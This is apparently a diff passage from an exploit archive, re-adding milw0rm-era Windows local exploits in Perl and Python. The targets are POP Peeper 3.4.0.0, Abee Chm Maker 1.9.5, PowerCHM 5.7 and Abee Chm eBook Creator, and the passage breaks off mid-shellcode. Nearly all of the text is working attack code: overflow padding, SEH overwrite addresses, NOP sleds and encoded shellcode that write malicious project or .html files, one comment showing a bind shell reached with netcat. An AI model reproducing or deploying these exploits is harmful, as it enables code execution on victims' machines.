-"\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x35". -"\x4f\x4f\x48\x4d\x43\x45\x43\x45\x43\x45\x43\x55\x43\x55\x43\x44". -"\x43\x45\x43\x44\x43\x35\x4f\x4f\x42\x4d\x48\x56\x4a\x46\x45\x31". -"\x43\x4b\x48\x56\x43\x35\x49\x38\x41\x4e\x45\x49\x4a\x36\x46\x4a". -"\x4c\x51\x42\x47\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x56\x42\x41". -"\x41\x55\x45\x45\x4f\x4f\x42\x4d\x4a\x46\x46\x4a\x4d\x4a\x50\x32". -"\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x35\x45\x55\x4f\x4f\x42\x4d". -"\x4a\x56\x45\x4e\x49\x54\x48\x48\x49\x44\x47\x35\x4f\x4f\x48\x4d". -"\x42\x45\x46\x35\x46\x55\x45\x55\x4f\x4f\x42\x4d\x43\x49\x4a\x46". -"\x47\x4e\x49\x37\x48\x4c\x49\x57\x47\x55\x4f\x4f\x48\x4d\x45\x55". -"\x4f\x4f\x42\x4d\x48\x46\x4c\x46\x46\x46\x48\x36\x4a\x36\x43\x56". -"\x4d\x36\x49\x38\x45\x4e\x4c\x56\x42\x45\x49\x55\x49\x32\x4e\x4c". -"\x49\x48\x47\x4e\x4c\x36\x46\x44\x49\x58\x44\x4e\x41\x43\x42\x4c". -"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x32\x50\x4f\x44\x44\x4e\x32". -"\x43\x39\x4d\x48\x4c\x37\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56". -"\x44\x57\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x57\x46\x34\x4f\x4f". -"\x48\x4d\x4b\x45\x47\x55\x44\x55\x41\x55\x41\x45\x41\x55\x4c\x46". -"\x41\x50\x41\x45\x41\x35\x45\x45\x41\x35\x4f\x4f\x42\x4d\x4a\x56". -"\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x56". -"\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x58\x47\x35\x4e\x4f". -"\x43\x48\x46\x4c\x46\x46\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d". -"\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x45\x43\x55\x4f\x4f\x48\x4d". -"\x4f\x4f\x42\x4d\x5a". - # End Scode -################ -"\x0D\x54\x4F\x3A\x20\x53\x74\x61\x63\x6B\x20\x3A\x64\x20". 
# Second Header -"\x0D\x0D"; -################ -print $mp; - -# milw0rm.com [2009-03-23] +# POP Peeper 3.4.0.0 .html file Universal SEH Overwrite Exploit +# Exploit By Stack +# Mountassif Moad +# How to use : file > Open message or Ctrl + O +# Select The .html file ......>> +# Connect With 5555 Port +# C:\nc>nc -v 127.0.0.1 5555 +# DNS fwd/rev mismatch: localhost != stack-a4eeb2267 +# localhost [127.0.0.1] 5555 (?) open +# Microsoft Windows XP [version 5.1.2600] +# (C) Copyright 1985-2001 Microsoft Corp. +# C:\Program Files\POP Peeper> +# Boom Box Connected :d +# Thnx Simo- SOft - Jadi - Str0ke +# usage perl xpl.pl >>stack.html +my $mp= +################ +"\x46\x52\x4F\x4D\x3A\x20". # First Header +################ +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". # Start Junk +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". 
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". # End Junk +################ +"\xeb\x06\x90\x90". # Next_Seh +"\x4c\x51\x01\x10". # SEh ( Universal ) +################ +"\x90\x90\x90\x90\x90\x90\x90\x90". # Start Nop +"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90". # End Nop +################ +# Start Scode +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". +"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". +"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". +"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". +"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x46\x4b\x4e". +"\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x38". +"\x4e\x36\x46\x42\x46\x42\x4b\x38\x45\x54\x4e\x43\x4b\x58\x4e\x57". +"\x45\x30\x4a\x37\x41\x50\x4f\x4e\x4b\x58\x4f\x34\x4a\x41\x4b\x58". +"\x4f\x35\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x38\x46\x43\x4b\x38". +"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x38\x42\x4c". +"\x46\x47\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e". +"\x46\x4f\x4b\x53\x46\x55\x46\x32\x4a\x32\x45\x57\x45\x4e\x4b\x38". +"\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x56\x4b\x38\x4e\x50\x4b\x54". +"\x4b\x48\x4f\x45\x4e\x51\x41\x30\x4b\x4e\x43\x50\x4e\x32\x4b\x38". +"\x49\x58\x4e\x36\x46\x52\x4e\x51\x41\x56\x43\x4c\x41\x53\x4b\x4d". +"\x46\x36\x4b\x38\x43\x34\x42\x43\x4b\x48\x42\x44\x4e\x30\x4b\x48". +"\x42\x47\x4e\x51\x4d\x4a\x4b\x48\x42\x44\x4a\x30\x50\x35\x4a\x36". +"\x50\x58\x50\x34\x50\x30\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x46". +"\x43\x45\x48\x36\x4a\x36\x43\x33\x44\x33\x4a\x46\x47\x57\x43\x57". +"\x44\x53\x4f\x45\x46\x55\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e". +"\x4e\x4f\x4b\x53\x42\x35\x4f\x4f\x48\x4d\x4f\x35\x49\x38\x45\x4e". 
+"\x48\x56\x41\x58\x4d\x4e\x4a\x30\x44\x30\x45\x55\x4c\x56\x44\x30". +"\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x35". +"\x4f\x4f\x48\x4d\x43\x45\x43\x45\x43\x45\x43\x55\x43\x55\x43\x44". +"\x43\x45\x43\x44\x43\x35\x4f\x4f\x42\x4d\x48\x56\x4a\x46\x45\x31". +"\x43\x4b\x48\x56\x43\x35\x49\x38\x41\x4e\x45\x49\x4a\x36\x46\x4a". +"\x4c\x51\x42\x47\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x56\x42\x41". +"\x41\x55\x45\x45\x4f\x4f\x42\x4d\x4a\x46\x46\x4a\x4d\x4a\x50\x32". +"\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x35\x45\x55\x4f\x4f\x42\x4d". +"\x4a\x56\x45\x4e\x49\x54\x48\x48\x49\x44\x47\x35\x4f\x4f\x48\x4d". +"\x42\x45\x46\x35\x46\x55\x45\x55\x4f\x4f\x42\x4d\x43\x49\x4a\x46". +"\x47\x4e\x49\x37\x48\x4c\x49\x57\x47\x55\x4f\x4f\x48\x4d\x45\x55". +"\x4f\x4f\x42\x4d\x48\x46\x4c\x46\x46\x46\x48\x36\x4a\x36\x43\x56". +"\x4d\x36\x49\x38\x45\x4e\x4c\x56\x42\x45\x49\x55\x49\x32\x4e\x4c". +"\x49\x48\x47\x4e\x4c\x36\x46\x44\x49\x58\x44\x4e\x41\x43\x42\x4c". +"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x32\x50\x4f\x44\x44\x4e\x32". +"\x43\x39\x4d\x48\x4c\x37\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56". +"\x44\x57\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x57\x46\x34\x4f\x4f". +"\x48\x4d\x4b\x45\x47\x55\x44\x55\x41\x55\x41\x45\x41\x55\x4c\x46". +"\x41\x50\x41\x45\x41\x35\x45\x45\x41\x35\x4f\x4f\x42\x4d\x4a\x56". +"\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x56". +"\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x58\x47\x35\x4e\x4f". +"\x43\x48\x46\x4c\x46\x46\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d". +"\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x45\x43\x55\x4f\x4f\x48\x4d". +"\x4f\x4f\x42\x4d\x5a". + # End Scode +################ +"\x0D\x54\x4F\x3A\x20\x53\x74\x61\x63\x6B\x20\x3A\x64\x20". # Second Header +"\x0D\x0D"; +################ +print $mp; + +# milw0rm.com [2009-03-23] diff --git a/platforms/windows/local/8299.py b/platforms/windows/local/8299.py index dbc421de2..66c44d11b 100755 --- a/platforms/windows/local/8299.py +++ b/platforms/windows/local/8299.py 
@@ -1,100 +1,100 @@ -# exploit.py -# Abee Chm Maker 1.9.5 Stack overflow Exploit -# By:Encrypt3d.M!nd -# -# After importing "Devil_inside.cmp" file into the program -# go to File>>Make CHM.. Then...watch :) . -# -# i've used SEH overwrite method to make it more stable. -# btw:it's universal so don't bother your self with finding addresses ;) -# - -ns = "\xEB\x06\x90\x90" -sh = "\x05\x67\x35\x45" - -shellcode = ( -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49" -"\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x61" -"\x58\x30\x41\x31\x50\x41\x42\x6b\x42\x41\x71\x32\x42\x42\x42\x32" -"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x4d\x39\x69\x6c\x4d" -"\x38\x43\x74\x35\x50\x53\x30\x77\x70\x4e\x6b\x53\x75\x77\x4c\x4c" -"\x4b\x63\x4c\x54\x45\x34\x38\x67\x71\x5a\x4f\x6c\x4b\x62\x6f\x75" -"\x48\x6e\x6b\x41\x4f\x47\x50\x33\x31\x58\x6b\x63\x79\x4e\x6b\x36" -"\x54\x4c\x4b\x45\x51\x68\x6e\x34\x71\x59\x50\x4c\x59\x4c\x6c\x4f" -"\x74\x6f\x30\x72\x54\x47\x77\x58\x41\x39\x5a\x34\x4d\x57\x71\x69" -"\x52\x48\x6b\x69\x64\x67\x4b\x46\x34\x66\x44\x74\x44\x53\x45\x6b" -"\x55\x4c\x4b\x43\x6f\x31\x34\x67\x71\x78\x6b\x63\x56\x4c\x4b\x54" -"\x4c\x62\x6b\x6e\x6b\x31\x4f\x67\x6c\x37\x71\x78\x6b\x4c\x4b\x45" -"\x4c\x4c\x4b\x73\x31\x4a\x4b\x6c\x49\x51\x4c\x74\x64\x67\x74\x6b" -"\x73\x34\x71\x6f\x30\x42\x44\x6c\x4b\x71\x50\x34\x70\x4e\x65\x4f" -"\x30\x62\x58\x46\x6c\x6c\x4b\x41\x50\x44\x4c\x4c\x4b\x42\x50\x65" -"\x4c\x4e\x4d\x6e\x6b\x50\x68\x34\x48\x4a\x4b\x73\x39\x6e\x6b\x4b" -"\x30\x4c\x70\x57\x70\x63\x30\x37\x70\x4e\x6b\x42\x48\x57\x4c\x51" -"\x4f\x56\x51\x48\x76\x31\x70\x73\x66\x6e\x69\x59\x68\x4e\x63\x4f" -"\x30\x73\x4b\x66\x30\x65\x38\x68\x70\x6d\x5a\x34\x44\x51\x4f\x30" -"\x68\x4e\x78\x4b\x4e\x6c\x4a\x54\x4e\x32\x77\x79\x6f\x79\x77\x41" -"\x73\x75\x31\x72\x4c\x41\x73\x57\x70\x61") - -header1 = ( -'<?xml version="1.0" encoding="Windows-1252" ?>\n' -'<XMLConfig><info>Chm Maker project</info>\n' -'<group name="Contents">\n' -' <group name="0">\n' -' <param 
name="Caption">filename</param>\n' -' <param name="Level">0</param>\n' -' <param name="FileName">'+"\x41"*320+ns+sh+"\x90"*20+shellcode+"\x41" * 5000) - -header2 = ( -'</param>\n' -' </group>\n' -' <param name="Count">1</param>\n' -'</group>\n' -'<group name="Keywords">\n' -' <param name="Count">0</param>\n' -'</group>\n' -'<group name="KeywordsFinder">\n' -' <param name="UseMeta">1</param>\n' -' <param name="UseBold">1</param>\n' -' <param name="UseItalic">0</param>\n' -' <param name="UseUnder">0</param>\n' -' <param name="UseHTag">1</param>\n' -' <param name="UseTabHeader">0</param>\n' -' <param name="MaxKeyLength">32</param>\n' -' <param name="LiveUpdate">0</param>\n' -'</group>\n' -'<group name="Customize">\n' -' <param name="MainTitle">kkkkkkkkkkkkkkk</param>\n' -' <param name="DefaultPage"></param>\n' -' <param name="Left">0</param>\n' -' <param name="Top">0</param>\n' -' <param name="Width">0</param>\n' -' <param name="Heigth">0</param>\n' -' <param name="HideShow">1</param>\n' -' <param name="Back">1</param>\n' -' <param name="Forward">1</param>\n' -' <param name="Stop">0</param>\n' -' <param name="Refresh">0</param>\n' -' <param name="Options">1</param>\n' -' <param name="Print">1</param>\n' -' <param name="Font">0</param>\n' -' <param name="Locate">0</param>\n' -' <param name="Home">0</param>\n' -' <param name="HomePage"></param>\n' -' <param name="Jump1">0</param>\n' -' <param name="Jump1Page"></param>\n' -' <param name="Jump1Title"></param>\n' -' <param name="Jump2">0</param>\n' -' <param name="Jump2Page"></param>\n' -' <param name="Jump2Title"></param>\n' -' <param name="Search">1</param>\n' -' <param name="AdditionalFiles"></param>\n' -'</group>\n' -'</XMLConfig>\n' -) - - -file=open('Devil_Inside.cmp','w') -file.write(header1+header2) -file.close() - -# milw0rm.com [2009-03-27] +# exploit.py +# Abee Chm Maker 1.9.5 Stack overflow Exploit +# By:Encrypt3d.M!nd +# +# After importing "Devil_inside.cmp" file into the program +# go to File>>Make CHM.. 
Then...watch :) . +# +# i've used SEH overwrite method to make it more stable. +# btw:it's universal so don't bother your self with finding addresses ;) +# + +ns = "\xEB\x06\x90\x90" +sh = "\x05\x67\x35\x45" + +shellcode = ( +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49" +"\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x61" +"\x58\x30\x41\x31\x50\x41\x42\x6b\x42\x41\x71\x32\x42\x42\x42\x32" +"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x4d\x39\x69\x6c\x4d" +"\x38\x43\x74\x35\x50\x53\x30\x77\x70\x4e\x6b\x53\x75\x77\x4c\x4c" +"\x4b\x63\x4c\x54\x45\x34\x38\x67\x71\x5a\x4f\x6c\x4b\x62\x6f\x75" +"\x48\x6e\x6b\x41\x4f\x47\x50\x33\x31\x58\x6b\x63\x79\x4e\x6b\x36" +"\x54\x4c\x4b\x45\x51\x68\x6e\x34\x71\x59\x50\x4c\x59\x4c\x6c\x4f" +"\x74\x6f\x30\x72\x54\x47\x77\x58\x41\x39\x5a\x34\x4d\x57\x71\x69" +"\x52\x48\x6b\x69\x64\x67\x4b\x46\x34\x66\x44\x74\x44\x53\x45\x6b" +"\x55\x4c\x4b\x43\x6f\x31\x34\x67\x71\x78\x6b\x63\x56\x4c\x4b\x54" +"\x4c\x62\x6b\x6e\x6b\x31\x4f\x67\x6c\x37\x71\x78\x6b\x4c\x4b\x45" +"\x4c\x4c\x4b\x73\x31\x4a\x4b\x6c\x49\x51\x4c\x74\x64\x67\x74\x6b" +"\x73\x34\x71\x6f\x30\x42\x44\x6c\x4b\x71\x50\x34\x70\x4e\x65\x4f" +"\x30\x62\x58\x46\x6c\x6c\x4b\x41\x50\x44\x4c\x4c\x4b\x42\x50\x65" +"\x4c\x4e\x4d\x6e\x6b\x50\x68\x34\x48\x4a\x4b\x73\x39\x6e\x6b\x4b" +"\x30\x4c\x70\x57\x70\x63\x30\x37\x70\x4e\x6b\x42\x48\x57\x4c\x51" +"\x4f\x56\x51\x48\x76\x31\x70\x73\x66\x6e\x69\x59\x68\x4e\x63\x4f" +"\x30\x73\x4b\x66\x30\x65\x38\x68\x70\x6d\x5a\x34\x44\x51\x4f\x30" +"\x68\x4e\x78\x4b\x4e\x6c\x4a\x54\x4e\x32\x77\x79\x6f\x79\x77\x41" +"\x73\x75\x31\x72\x4c\x41\x73\x57\x70\x61") + +header1 = ( +'<?xml version="1.0" encoding="Windows-1252" ?>\n' +'<XMLConfig><info>Chm Maker project</info>\n' +'<group name="Contents">\n' +' <group name="0">\n' +' <param name="Caption">filename</param>\n' +' <param name="Level">0</param>\n' +' <param name="FileName">'+"\x41"*320+ns+sh+"\x90"*20+shellcode+"\x41" * 5000) + +header2 = ( +'</param>\n' +' 
</group>\n' +' <param name="Count">1</param>\n' +'</group>\n' +'<group name="Keywords">\n' +' <param name="Count">0</param>\n' +'</group>\n' +'<group name="KeywordsFinder">\n' +' <param name="UseMeta">1</param>\n' +' <param name="UseBold">1</param>\n' +' <param name="UseItalic">0</param>\n' +' <param name="UseUnder">0</param>\n' +' <param name="UseHTag">1</param>\n' +' <param name="UseTabHeader">0</param>\n' +' <param name="MaxKeyLength">32</param>\n' +' <param name="LiveUpdate">0</param>\n' +'</group>\n' +'<group name="Customize">\n' +' <param name="MainTitle">kkkkkkkkkkkkkkk</param>\n' +' <param name="DefaultPage"></param>\n' +' <param name="Left">0</param>\n' +' <param name="Top">0</param>\n' +' <param name="Width">0</param>\n' +' <param name="Heigth">0</param>\n' +' <param name="HideShow">1</param>\n' +' <param name="Back">1</param>\n' +' <param name="Forward">1</param>\n' +' <param name="Stop">0</param>\n' +' <param name="Refresh">0</param>\n' +' <param name="Options">1</param>\n' +' <param name="Print">1</param>\n' +' <param name="Font">0</param>\n' +' <param name="Locate">0</param>\n' +' <param name="Home">0</param>\n' +' <param name="HomePage"></param>\n' +' <param name="Jump1">0</param>\n' +' <param name="Jump1Page"></param>\n' +' <param name="Jump1Title"></param>\n' +' <param name="Jump2">0</param>\n' +' <param name="Jump2Page"></param>\n' +' <param name="Jump2Title"></param>\n' +' <param name="Search">1</param>\n' +' <param name="AdditionalFiles"></param>\n' +'</group>\n' +'</XMLConfig>\n' +) + + +file=open('Devil_Inside.cmp','w') +file.write(header1+header2) +file.close() + +# milw0rm.com [2009-03-27] diff --git a/platforms/windows/local/8301.pl b/platforms/windows/local/8301.pl index a7c949b67..b8c115141 100755 --- a/platforms/windows/local/8301.pl +++ b/platforms/windows/local/8301.pl 
@@ -1,58 +1,58 @@ -#!/usr/bin/perl -# -# Title: PowerCHM 5.7 (hhp) Local Buffer Overflow Exploit -# -# Summary: With PowerCHM you can create your CHM files -# automatically from Html Files (including .htm, .html -# and .mht), Text Files (.txt), Microsoft Word Documents -# (.doc) and Adobe Acrobat Document (.pdf). -# -# Product web page: http://www.dawningsoft.com/products/powerchm.htm -# -# Tested on WinXP Pro SP2 (English) -# -# Refs: http://www.milw0rm.com/exploits/8300 -# http://security.biks.vn/?p=365 -# -# Exploit by Gjoko 'LiquidWorm' Krstic -# -# liquidworm gmail com -# -# http://www.zeroscience.org/ -# -# 28.03.2009 -# - -my $header=" - [OPTIONS]\n - Compatibility=1.1 or later\n - Compiled file=zero.chm\n - Contents file=science.hhc\n - Index file=lqwrm.hhk\n - Binary Index=Yes\n - Language=0x042F\n - Title=\n - Error log file=Errlog.txt\n - Default Window=main\n\n - [WINDOWS]\n - main='',science.hhc,lqwrm.hhk,'','',,,,,0x41520,240,0x184E,[262,184,762,584],,,,0,0,0,0\n\n - [FILES]\n\n - [INFOTYPES]\n - "; - - -my $sc ="\x8B\xEC\x33\xFF\x57\xC6\x45\xFC\x63\xC6\x45". - "\xFD\x6D\xC6\x45\xFE\x64\xC6\x45\xF8\x01\x8D". - "\x45\xFC\x50\xB8\xC7\x93\xBF\x77\xFF\xD0"; - - -my $bof = "\x90" x 568 . "$sc" . "\x41" x 400 . "\xe8\xed\x12\x00" . "\x42" x 500; - -my $file = "Watchmen.hhp"; -open (hhp, ">./$file") || die "\nCan't open $file: $!"; -print hhp "$header" . "$bof"; -close (hhp); -sleep 1; -print "\nFile $file successfully created!\n"; - -# milw0rm.com [2009-03-29] +#!/usr/bin/perl +# +# Title: PowerCHM 5.7 (hhp) Local Buffer Overflow Exploit +# +# Summary: With PowerCHM you can create your CHM files +# automatically from Html Files (including .htm, .html +# and .mht), Text Files (.txt), Microsoft Word Documents +# (.doc) and Adobe Acrobat Document (.pdf). 
+# +# Product web page: http://www.dawningsoft.com/products/powerchm.htm +# +# Tested on WinXP Pro SP2 (English) +# +# Refs: http://www.milw0rm.com/exploits/8300 +# http://security.biks.vn/?p=365 +# +# Exploit by Gjoko 'LiquidWorm' Krstic +# +# liquidworm gmail com +# +# http://www.zeroscience.org/ +# +# 28.03.2009 +# + +my $header=" + [OPTIONS]\n + Compatibility=1.1 or later\n + Compiled file=zero.chm\n + Contents file=science.hhc\n + Index file=lqwrm.hhk\n + Binary Index=Yes\n + Language=0x042F\n + Title=\n + Error log file=Errlog.txt\n + Default Window=main\n\n + [WINDOWS]\n + main='',science.hhc,lqwrm.hhk,'','',,,,,0x41520,240,0x184E,[262,184,762,584],,,,0,0,0,0\n\n + [FILES]\n\n + [INFOTYPES]\n + "; + + +my $sc ="\x8B\xEC\x33\xFF\x57\xC6\x45\xFC\x63\xC6\x45". + "\xFD\x6D\xC6\x45\xFE\x64\xC6\x45\xF8\x01\x8D". + "\x45\xFC\x50\xB8\xC7\x93\xBF\x77\xFF\xD0"; + + +my $bof = "\x90" x 568 . "$sc" . "\x41" x 400 . "\xe8\xed\x12\x00" . "\x42" x 500; + +my $file = "Watchmen.hhp"; +open (hhp, ">./$file") || die "\nCan't open $file: $!"; +print hhp "$header" . "$bof"; +close (hhp); +sleep 1; +print "\nFile $file successfully created!\n"; + +# milw0rm.com [2009-03-29] diff --git a/platforms/windows/local/8311.py b/platforms/windows/local/8311.py index afdea202c..4e3cbb86e 100755 --- a/platforms/windows/local/8311.py +++ b/platforms/windows/local/8311.py 
@@ -1,100 +1,100 @@ -# exploit.py -# Abee Chm eBook Creator 2.11 Stack overflow Exploit -# By:Encrypt3d.M!nd -# -# it's the same exploit i wrote for chm maker,everything is the same!! -# but there's a lil note that when importing 'Devil_Inside.chmprj' a message -# will pops up and tells that the project file format is outdated bla bla but after clicking -# ok it will load into the program,and just go to File>Make Ebook.. and calc -# p.s:you can avoid the message by using chm ebook project data,i'm lazy to do that -# so i've used the chm maker one :D - -ns = "\xEB\x06\x90\x90" -sh = "\x05\x67\x35\x45" - -shellcode = ( -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49" -"\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x61" -"\x58\x30\x41\x31\x50\x41\x42\x6b\x42\x41\x71\x32\x42\x42\x42\x32" -"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x4d\x39\x69\x6c\x4d" -"\x38\x43\x74\x35\x50\x53\x30\x77\x70\x4e\x6b\x53\x75\x77\x4c\x4c" -"\x4b\x63\x4c\x54\x45\x34\x38\x67\x71\x5a\x4f\x6c\x4b\x62\x6f\x75" -"\x48\x6e\x6b\x41\x4f\x47\x50\x33\x31\x58\x6b\x63\x79\x4e\x6b\x36" -"\x54\x4c\x4b\x45\x51\x68\x6e\x34\x71\x59\x50\x4c\x59\x4c\x6c\x4f" -"\x74\x6f\x30\x72\x54\x47\x77\x58\x41\x39\x5a\x34\x4d\x57\x71\x69" -"\x52\x48\x6b\x69\x64\x67\x4b\x46\x34\x66\x44\x74\x44\x53\x45\x6b" -"\x55\x4c\x4b\x43\x6f\x31\x34\x67\x71\x78\x6b\x63\x56\x4c\x4b\x54" -"\x4c\x62\x6b\x6e\x6b\x31\x4f\x67\x6c\x37\x71\x78\x6b\x4c\x4b\x45" -"\x4c\x4c\x4b\x73\x31\x4a\x4b\x6c\x49\x51\x4c\x74\x64\x67\x74\x6b" -"\x73\x34\x71\x6f\x30\x42\x44\x6c\x4b\x71\x50\x34\x70\x4e\x65\x4f" -"\x30\x62\x58\x46\x6c\x6c\x4b\x41\x50\x44\x4c\x4c\x4b\x42\x50\x65" -"\x4c\x4e\x4d\x6e\x6b\x50\x68\x34\x48\x4a\x4b\x73\x39\x6e\x6b\x4b" -"\x30\x4c\x70\x57\x70\x63\x30\x37\x70\x4e\x6b\x42\x48\x57\x4c\x51" -"\x4f\x56\x51\x48\x76\x31\x70\x73\x66\x6e\x69\x59\x68\x4e\x63\x4f" -"\x30\x73\x4b\x66\x30\x65\x38\x68\x70\x6d\x5a\x34\x44\x51\x4f\x30" -"\x68\x4e\x78\x4b\x4e\x6c\x4a\x54\x4e\x32\x77\x79\x6f\x79\x77\x41" 
-"\x73\x75\x31\x72\x4c\x41\x73\x57\x70\x61") - -header1 = ( -'<?xml version="1.0" encoding="Windows-1252" ?>\n' -'<XMLConfig><info>Chm Maker project</info>\n' -'<group name="Contents">\n' -' <group name="0">\n' -' <param name="Caption">filename</param>\n' -' <param name="Level">0</param>\n' -' <param name="FileName">'+"\x41"*320+ns+sh+"\x90"*20+shellcode+"\x41" * 5000) - -header2 = ( -'</param>\n' -' </group>\n' -' <param name="Count">1</param>\n' -'</group>\n' -'<group name="Keywords">\n' -' <param name="Count">0</param>\n' -'</group>\n' -'<group name="KeywordsFinder">\n' -' <param name="UseMeta">1</param>\n' -' <param name="UseBold">1</param>\n' -' <param name="UseItalic">0</param>\n' -' <param name="UseUnder">0</param>\n' -' <param name="UseHTag">1</param>\n' -' <param name="UseTabHeader">0</param>\n' -' <param name="MaxKeyLength">32</param>\n' -' <param name="LiveUpdate">0</param>\n' -'</group>\n' -'<group name="Customize">\n' -' <param name="MainTitle">kkkkkkkkkkkkkkk</param>\n' -' <param name="DefaultPage"></param>\n' -' <param name="Left">0</param>\n' -' <param name="Top">0</param>\n' -' <param name="Width">0</param>\n' -' <param name="Heigth">0</param>\n' -' <param name="HideShow">1</param>\n' -' <param name="Back">1</param>\n' -' <param name="Forward">1</param>\n' -' <param name="Stop">0</param>\n' -' <param name="Refresh">0</param>\n' -' <param name="Options">1</param>\n' -' <param name="Print">1</param>\n' -' <param name="Font">0</param>\n' -' <param name="Locate">0</param>\n' -' <param name="Home">0</param>\n' -' <param name="HomePage"></param>\n' -' <param name="Jump1">0</param>\n' -' <param name="Jump1Page"></param>\n' -' <param name="Jump1Title"></param>\n' -' <param name="Jump2">0</param>\n' -' <param name="Jump2Page"></param>\n' -' <param name="Jump2Title"></param>\n' -' <param name="Search">1</param>\n' -' <param name="AdditionalFiles"></param>\n' -'</group>\n' -'</XMLConfig>\n' -) - - -file=open('Devil_Inside.chmprj','w') 
-file.write(header1+header2) -file.close() - -# milw0rm.com [2009-03-30] +# exploit.py +# Abee Chm eBook Creator 2.11 Stack overflow Exploit +# By:Encrypt3d.M!nd +# +# it's the same exploit i wrote for chm maker,everything is the same!! +# but there's a lil note that when importing 'Devil_Inside.chmprj' a message +# will pops up and tells that the project file format is outdated bla bla but after clicking +# ok it will load into the program,and just go to File>Make Ebook.. and calc +# p.s:you can avoid the message by using chm ebook project data,i'm lazy to do that +# so i've used the chm maker one :D + +ns = "\xEB\x06\x90\x90" +sh = "\x05\x67\x35\x45" + +shellcode = ( +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49" 